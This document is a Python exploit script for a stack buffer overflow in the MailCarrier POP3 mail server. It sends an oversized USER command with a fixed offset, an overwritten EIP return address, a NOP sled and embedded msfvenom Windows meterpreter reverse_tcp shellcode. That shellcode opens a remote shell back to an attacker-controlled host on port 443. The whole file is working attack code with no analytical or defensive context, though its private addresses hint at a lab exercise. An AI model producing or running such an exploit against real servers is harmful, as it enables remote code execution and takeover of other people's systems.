mailserver_bof_최종본.py

#!/usr/bin/env python3

import socket
import sys
import struct
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -b "\x00" lhost=192.168.100.3 lport=443 -f py
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
eip_value = 0x0fa14923   # MailCarrier EIP Value
packed_data = struct.pack('<I', eip_value)
buf =  b""
buf += b"\xb8\x25\xdc\x1f\x3b\xdb\xca\xd9\x74\x24\xf4\x5b"
buf += b"\x29\xc9\xb1\x59\x31\x43\x14\x83\xc3\x04\x03\x43"
buf += b"\x10\xc7\x29\xe3\xd3\x88\xd2\x1c\x24\xf6\x5b\xf9"
buf += b"\x15\x24\x3f\x89\x04\xf8\x4b\xdf\xa4\x73\x19\xf4"
buf += b"\xbb\x34\xd4\xd2\xf2\xc5\x62\x68\xdd\x08\xb5\x21"
buf += b"\x21\x0b\x49\x38\x76\xeb\x70\xf3\x8b\xea\xb5\x45"
buf += b"\xe1\x03\x6b\x01\x82\x89\x9c\x26\xd6\x11\x9c\xe8"
buf += b"\x5c\x29\xe6\x8d\xa3\xdd\x5a\x8f\xf3\x96\x3b\xaf"
buf += b"\x78\xe0\xa3\xae\xad\xa0\x56\x79\x25\x7c\x68\x85"
buf += b"\x8f\xf7\xbe\xf2\x11\xd1\x8e\xc4\xd3\x12\xfd\x68"
buf += b"\xd2\x6b\xc6\x90\xa0\x87\x34\x2c\xb3\x5c\x46\xea"
buf += b"\x36\x42\xe0\x79\xe0\xa6\x10\xad\x77\x2d\x1e\x1a"
buf += b"\xf3\x69\x03\x9d\xd0\x02\x3f\x16\xd7\xc4\xc9\x6c"
buf += b"\xfc\xc0\x92\x37\x9d\x51\x7f\x99\xa2\x81\x27\x46"
buf += b"\x07\xca\xca\x91\x37\x33\x15\x9e\x65\xa3\xd9\x53"
buf += b"\x96\x33\x76\xe3\xe5\x01\xd9\x5f\x62\x29\x92\x79"
buf += b"\x75\x38\xb4\x79\xa9\x82\xd5\x87\x4a\xf2\xfc\x43"
buf += b"\x1e\xa2\x96\x62\x1f\x29\x67\x8a\xca\xc7\x6d\x1c"
buf += b"\x35\xbf\x72\xdf\xdd\xbd\x72\xde\xa6\x48\x94\xb0"
buf += b"\x88\x1a\x09\x71\x79\xda\xf9\x19\x93\xd5\x26\x39"
buf += b"\x9c\x3c\x4f\xd0\x73\xe8\x27\x4d\xed\xb1\xbc\xec"
buf += b"\xf2\x6c\xb9\x2f\x78\x84\x3d\xe1\x89\xed\x2d\x16"
buf += b"\xee\x0d\xae\xe7\x9b\x0d\xc4\xe3\x0d\x5a\x70\xee"
buf += b"\x68\xac\xdf\x11\x5f\xaf\x18\xed\x1e\x99\x53\xd8"
buf += b"\xb4\xa5\x0b\x25\x59\x25\xcc\x73\x33\x25\xa4\x23"
buf += b"\x67\x76\xd1\x2b\xb2\xeb\x4a\xbe\x3d\x5d\x3e\x69"
buf += b"\x56\x63\x19\x5d\xf9\x9c\x4c\xdd\xfe\x62\x12\xca"
buf += b"\xa6\x0a\xec\x4a\x57\xca\x86\x4a\x07\xa2\x5d\x64"
buf += b"\xa8\x02\x9d\xaf\xe1\x0a\x14\x3e\x43\xab\x29\x6b"
buf += b"\x05\x75\x29\x98\x9e\x86\x50\xd1\x21\x67\xa5\xfb"
buf += b"\x45\x68\xa5\x03\x78\x55\x73\x3a\x0e\x98\x47\x79"
buf += b"\x01\xaf\xea\x28\x88\xcf\xb9\x2b\x99"

try:
  connect_result = sock.connect_ex(('192.168.100.3', 110))
  sock.recv(1024)
  A    = b'USER '
  B    = b'A'*5096      # offset
  C    = packed_data     # EIP Value
  D    = b"\x90" * 20    # NOP Sled
  E    = buf
  F    = b'\r\n'

  last_msg = A + B + C + D + E + F
  sock.send(last_msg)  
  print('[*] --------Done !--------------\n')
except Exception as e:
  print(f'[*] Error : {e} ')
  sys.exit()